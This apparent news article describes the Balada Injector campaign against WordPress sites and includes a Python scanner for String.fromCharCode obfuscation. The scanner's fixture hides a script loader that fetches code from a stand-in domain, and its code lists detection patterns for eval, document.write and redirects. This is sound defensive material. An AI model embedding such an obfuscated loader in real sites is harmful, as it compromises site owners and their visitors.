
Balada Injector

According to security researchers, an ongoing attack campaign delivering malware tracked as the Balada Injector has managed to infect over one million WordPress websites. It is believed that the malicious operation has been active since at least 2017. The cybercriminals use a wide range of different techniques to exploit known and newly discovered vulnerabilities in WordPress themes and plugins, allowing them to gain access to the targeted websites.

The report detailing the Balada Injector, released by the security company Sucuri, states that new attack waves take place every couple of weeks. Several signature signs mark this particular malicious activity, including the use of String.fromCharCode obfuscation, the deployment of malicious scripts hosted on newly registered domain names, and redirects to various scam sites. The infected websites are used for a variety of fraudulent purposes, including fake tech support, lottery frauds, and rogue CAPTCHA pages that urge users to turn on notifications to verify that they are not robots, thus enabling the attackers to send spam ads.
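One way to hunt for the String.fromCharCode obfuscation the report cites, as an added example that is not code from the page, from Sucuri or from the campaign itself: a scanner that decodes every fromCharCode call found in theme, plugin and page files and flags payloads that resolve to loader tags or external domains. The suspicious-fragment list and the sample file are constructed for this example, and the `.invalid` domain is a placeholder.

```python
import re
from pathlib import Path

# A String.fromCharCode(...) call with a purely numeric argument list.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+?)\s*\)", re.IGNORECASE)

# Fragments that, once decoded, indicate a loader or redirect rather than benign use.
# These heuristics are assumptions of this example, not indicators from the report.
SUSPICIOUS_FRAGMENTS = ("<script", "src=", "location.href", "location.replace",
                        "document.write", "eval(")
DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def decode_fromcharcode(arg_list: str) -> str:
    """Decode the numeric argument list of String.fromCharCode into text."""
    codes = [int(c) for c in re.split(r"[,\s]+", arg_list.strip()) if c]
    return "".join(chr(c) for c in codes if 0 <= c <= 0x10FFFF)


def scan_text(text: str) -> list[dict]:
    """Return one finding per fromCharCode call whose decoded payload looks malicious."""
    findings = []
    for m in FROMCHARCODE_RE.finditer(text):
        decoded = decode_fromcharcode(m.group(1))
        hits = [f for f in SUSPICIOUS_FRAGMENTS if f in decoded]
        domains = DOMAIN_RE.findall(decoded)
        if hits or domains:
            findings.append({"offset": m.start(), "decoded": decoded,
                             "indicators": hits, "domains": domains})
    return findings


def scan_tree(root: str, suffixes=(".php", ".js", ".html", ".htm")) -> dict:
    """Scan every file under root (e.g. a WordPress docroot); map path -> findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(errors="ignore"))
            if found:
                report[str(path)] = found
    return report


# Constructed fixture: one benign call and one injected loader hidden behind fromCharCode.
_PAYLOAD = '<script src="https://freshly-registered.invalid/load.js"></script>'
SAMPLE_FILE = (
    "<?php /* theme footer */ ?>\n"
    "<script>var ok = String.fromCharCode(72, 105);</script>\n"  # decodes to "Hi"
    "<script>document.write(String.fromCharCode("
    + ",".join(str(ord(ch)) for ch in _PAYLOAD) + "));</script>\n"
)

if __name__ == "__main__":
    for f in scan_text(SAMPLE_FILE):
        print(f"offset {f['offset']}: {f['indicators']} {f['domains']}")
```

Run `scan_tree("/path/to/wordpress")` against a site copy to get a per-file report; legitimate fromCharCode uses such as the "Hi" call above are decoded but not reported.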

The Balada Injector Exploits Numerous Security Weaknesses

Over the course of its deployment, the Balada Injector threat has made use of more than 100 domains and various methods to exploit well-known security weaknesses, such as HTML injection and Site URL injection. The attackers' primary goal has been to gain access to the database credentials stored in the wp-config.php file.

Furthermore, the attacks are designed to access and download important site files such as backups, database dumps, log files, and error files. They also search for any leftover tools like adminer and phpmyadmin that site administrators may have left behind after performing maintenance tasks. This provides the attackers with a wider range of options to compromise the website and steal sensitive data.

The Balada Injector Provides Backdoor Access to the Cybercriminals

The Balada Injector malware has the ability to generate fraudulent WordPress admin users, collect data stored on the underlying hosts, and leave backdoors that provide persistent access to the system.

Moreover, Balada Injector performs extensive searches in the top-level directories of the compromised website's file system to identify writable directories belonging to other sites. Typically, these sites are owned by the same webmaster and share the same server account and file permissions. Thus, compromising one site can potentially provide access to multiple other sites, further expanding the attack.

If these methods fail, the attackers attempt to guess the admin password by brute force, using a set of 74 predetermined credentials. To prevent these types of attacks, WordPress users are strongly encouraged to keep their website software updated, remove any unused plugins and themes, and use strong passwords for their WordPress admin accounts.
